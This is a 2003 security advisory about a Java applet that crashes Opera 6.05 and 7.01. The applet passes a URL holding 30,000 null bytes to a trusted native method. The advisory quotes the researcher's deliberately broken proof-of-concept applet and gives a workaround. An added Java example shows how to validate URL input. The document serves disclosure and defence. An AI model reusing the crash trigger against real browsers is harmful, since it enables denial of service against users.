Opera Java-Applet crash
11th Feb 2003 [SBWID-5983]
COMMAND

	Opera Java-Applet crash

SYSTEMS AFFECTED

	Opera 6.05 and 7.01

PROBLEM

	Marc Schoenefeld [schonef@uni-muenster.de] says :
	
	--snip--
	
	Opera has its own class files in the opera.jar library. These are
	considered trusted by the system policies. But they are also vulnerable
	against invalid user input. In the proof-of-concept shown below the
	following showDocument method of the PluginContext object is called
	with a URL object carrying a very long string. Executing this method
	causes the call of a native method, which cannot handle the value and
	therefore raises a JVM crash, which then crashes Opera 7.01. This was
	observed on Windows XP and Opera 6.05/7.01 with Java enabled, directly
	calling the applet after installation.
	
	--snap--
	
	//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
	//not runnable, a little crippled, there are a couple of obvious syntax errors
	//to avoid script-kidding
	
	..
	import opera.PluginContext; // !! import the vulnerable class
	..
	
	public class OperaCall2 extends App1et
	{
	- -
	- -    public OperaCall2()
	- -    {
	- -    }
	- -
	- -    public void paint(Graphics g)
	- -    {
	- -        PluginContext plugincontext = new PluginContext(l);
	- -        try
	- -        {
	- -            plugincontext.showDocument(new URL("http://xxx.xxx" + new
	String(new byte[30000])));
	- -        }
	- -        catch(Exception exception)
	- -        {
	- -            exception.printStackTrace();
	- -        }
	- -    }
	}
	

SOLUTION

	Until a patch becomes available, disable Java by going to File ->
	Preferences -> Multimedia and unchecking the "Enable Java" item.
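
	The defect class described under PROBLEM is a trusted Java class passing
	applet-supplied data to a native method unchecked. The following is an
	added illustration of bounding and sanitizing the URL in the trusted layer
	first; it is not code from the advisory or from Opera, and the class name,
	the 2048-character limit and the stub standing in for the native call are
	assumptions.

```java
import java.net.MalformedURLException;
import java.net.URL;

// Added illustration, not Opera's code. Class, method names and the limit are assumptions.
public class GuardedShowDocument {
    static final int MAX_URL_LENGTH = 2048; // assumed bound for the native side

    // Returns null if the string may be passed on, otherwise the reason for refusing it.
    static String reject(String s) {
        if (s == null) return "null url";
        if (s.length() > MAX_URL_LENGTH) return "length " + s.length() + " exceeds " + MAX_URL_LENGTH;
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            // new String(new byte[n]) is n U+0000 characters; refuse those and other controls
            if (c < 0x20 || c == 0x7f) return "control character at index " + i;
        }
        return null;
    }

    // Stand-in for the native sink; the real one would be a `native` method.
    static void nativeShowDocument(String url) {
        System.out.println("passed to native layer: " + url.length() + " chars");
    }

    // Validation happens in the trusted Java layer, before the JNI boundary.
    static void showDocument(URL url) {
        String s = (url == null) ? null : url.toExternalForm();
        String reason = reject(s);
        if (reason != null) throw new IllegalArgumentException(reason);
        nativeShowDocument(s);
    }

    public static void main(String[] args) throws MalformedURLException {
        showDocument(new URL("http://example.com/index.html"));

        // Constructed inputs: an oversized string and one with embedded NULs.
        String longSpec = "http://example.com/" + new String(new char[30000]).replace('\0', 'A');
        String nulSpec = "http://example.com/" + new String(new byte[8]) + "/x";
        for (String spec : new String[] { longSpec, nulSpec }) {
            System.out.println(spec.length() + " chars -> " + reject(spec));
        }
    }
}
```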
